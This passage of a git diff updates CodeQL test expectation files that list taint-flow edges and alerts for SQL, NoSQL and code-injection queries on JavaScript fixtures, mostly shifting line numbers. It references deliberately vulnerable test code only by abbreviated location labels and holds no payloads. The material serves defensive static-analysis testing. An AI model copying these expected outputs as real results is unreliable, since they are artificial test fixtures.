mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | | mongooseModelClient.js:11:16:11:24 | { id: v } | mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:11:16:11:24 | { id: v } | This query object depends on a $@. | mongooseModelClient.js:10:22:10:29 | req.body | user-provided value | | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | This query object depends on a $@. | mongooseModelClient.js:12:22:12:29 | req.body | user-provided value | | mysql.js:15:18:15:65 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:15:18:15:65 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | @@ -751,7 +751,7 @@ subpaths | redis.js:43:27:43:29 | key | redis.js:38:17:38:24 | req.body | redis.js:43:27:43:29 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | | redis.js:46:34:46:36 | key | redis.js:38:17:38:24 | req.body | redis.js:46:34:46:36 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | | socketio.js:11:12:11:53 | `INSERT ... andle}` | socketio.js:10:25:10:30 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | This query string depends on a $@. | socketio.js:10:25:10:30 | handle | user-provided value | -| tst2.js:9:27:9:84 | "select ... d + "'" | tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:9:66:9:78 | req.params.id | user-provided value | +| tst2.js:8:27:8:84 | "select ... d + "'" | tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:8:66:8:78 | req.params.id | user-provided value | | tst3.js:9:14:9:19 | query1 | tst3.js:8:16:8:34 | req.params.category | tst3.js:9:14:9:19 | query1 | This query string depends on a $@. | tst3.js:8:16:8:34 | req.params.category | user-provided value | | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | This query string depends on a $@. | tst4.js:8:46:8:60 | $routeParams.id | user-provided value | | tst.js:10:10:10:64 | 'SELECT ... d + '"' | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | This query string depends on a $@. | tst.js:10:46:10:58 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected index e536c54dbd2f..59a5381f2cd2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected @@ -2,14 +2,14 @@ edges | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | provenance | | | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | @@ -28,17 +28,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | @@ -61,24 +61,24 @@ nodes | angularjs.js:47:16:47:30 | location.search | semmle.label | location.search | | angularjs.js:50:22:50:36 | location.search | semmle.label | location.search | | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | @@ -102,25 +102,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | @@ -147,16 +147,16 @@ subpaths | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | This code execution depends on a $@. | angularjs.js:47:16:47:30 | location.search | user-provided value | | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | This code execution depends on a $@. | angularjs.js:50:22:50:36 | location.search | user-provided value | | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | This code execution depends on a $@. | angularjs.js:53:32:53:46 | location.search | user-provided value | -| express.js:7:24:7:69 | "return ... + "];" | express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | This code execution depends on a $@. | express.js:7:44:7:62 | req.param("wobble") | user-provided value | -| express.js:9:34:9:79 | "return ... + "];" | express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | This code execution depends on a $@. | express.js:9:54:9:72 | req.param("wobble") | user-provided value | -| express.js:12:8:12:53 | "return ... + "];" | express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | This code execution depends on a $@. | express.js:12:28:12:46 | req.param("wobble") | user-provided value | -| express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | This code execution depends on a $@. | express.js:15:22:15:54 | req.par ... ction") | user-provided value | -| express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | This code execution depends on a $@. | express.js:17:30:17:53 | req.par ... cript") | user-provided value | -| express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | This code execution depends on a $@. | express.js:19:37:19:70 | req.par ... odule") | user-provided value | -| express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:21:19:21:48 | req.par ... ntext") | user-provided value | -| express.js:27:34:27:38 | taint | express.js:26:17:26:35 | req.param("wobble") | express.js:27:34:27:38 | taint | This code execution depends on a $@. | express.js:26:17:26:35 | req.param("wobble") | user-provided value | -| express.js:43:15:43:19 | taint | express.js:34:17:34:35 | req.param("wobble") | express.js:43:15:43:19 | taint | This code execution depends on a $@. | express.js:34:17:34:35 | req.param("wobble") | user-provided value | -| express.js:50:10:50:12 | msg | express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | This code execution depends on a $@. | express.js:49:30:49:32 | msg | user-provided value | +| express.js:6:24:6:69 | "return ... + "];" | express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | This code execution depends on a $@. | express.js:6:44:6:62 | req.param("wobble") | user-provided value | +| express.js:7:34:7:79 | "return ... + "];" | express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | This code execution depends on a $@. | express.js:7:54:7:72 | req.param("wobble") | user-provided value | +| express.js:9:8:9:53 | "return ... + "];" | express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | This code execution depends on a $@. | express.js:9:28:9:46 | req.param("wobble") | user-provided value | +| express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... ction") | This code execution depends on a $@. | express.js:11:22:11:54 | req.par ... ction") | user-provided value | +| express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | This code execution depends on a $@. | express.js:12:30:12:53 | req.par ... cript") | user-provided value | +| express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | This code execution depends on a $@. | express.js:13:37:13:70 | req.par ... odule") | user-provided value | +| express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:14:19:14:48 | req.par ... ntext") | user-provided value | +| express.js:20:34:20:38 | taint | express.js:19:17:19:35 | req.param("wobble") | express.js:20:34:20:38 | taint | This code execution depends on a $@. | express.js:19:17:19:35 | req.param("wobble") | user-provided value | +| express.js:36:15:36:19 | taint | express.js:27:17:27:35 | req.param("wobble") | express.js:36:15:36:19 | taint | This code execution depends on a $@. | express.js:27:17:27:35 | req.param("wobble") | user-provided value | +| express.js:43:10:43:12 | msg | express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | This code execution depends on a $@. | express.js:42:30:42:32 | msg | user-provided value | | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value | | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. | module.js:11:17:11:30 | req.query.code | user-provided value | | react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | @@ -176,17 +176,17 @@ subpaths | template-sinks.js:31:19:31:25 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:31:19:31:25 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | | template-sinks.js:32:16:32:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:32:16:32:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | | template-sinks.js:33:17:33:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:33:17:33:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| tst.js:2:6:2:83 | documen ... t=")+8) | tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:2:6:2:27 | documen ... on.href | user-provided value | -| tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:5:12:5:33 | documen ... on.hash | user-provided value | -| tst.js:14:10:14:74 | documen ... , "$1") | tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:14:10:14:33 | documen ... .search | user-provided value | -| tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:17:21:17:42 | documen ... on.hash | user-provided value | -| tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:20:30:20:51 | documen ... on.hash | user-provided value | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:6:23:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:23:11:23:32 | documen ... on.hash | user-provided value | -| tst.js:26:26:26:53 | locatio ... ring(1) | tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:26:26:26:40 | location.search | user-provided value | -| tst.js:31:18:31:23 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:31:18:31:23 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:33:14:33:19 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:33:14:33:19 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:35:28:35:33 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:35:28:35:33 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:37:33:37:38 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:37:33:37:38 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | +| tst.js:1:6:1:83 | documen ... t=")+8) | tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:1:6:1:27 | documen ... on.href | user-provided value | +| tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:3:12:3:33 | documen ... on.hash | user-provided value | +| tst.js:11:10:11:74 | documen ... , "$1") | tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:11:10:11:33 | documen ... .search | user-provided value | +| tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:13:21:13:42 | documen ... on.hash | user-provided value | +| tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:15:30:15:51 | documen ... on.hash | user-provided value | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:6:17:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:17:11:17:32 | documen ... on.hash | user-provided value | +| tst.js:19:26:19:53 | locatio ... ring(1) | tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:19:26:19:40 | location.search | user-provided value | +| tst.js:24:18:24:23 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:24:18:24:23 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:26:14:26:19 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:26:14:26:19 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:28:28:28:33 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:28:28:28:33 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:30:33:30:38 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:30:33:30:38 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | This code execution depends on a $@. | webix/webix.html:3:16:3:37 | documen ... on.hash | user-provided value | | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:4:26:4:47 | documen ... on.hash | user-provided value | | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:5:47:5:68 | documen ... on.hash | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected index 2be7dc659f29..ba973943e124 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected @@ -3,14 +3,14 @@ edges | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | | eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | @@ -29,17 +29,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | 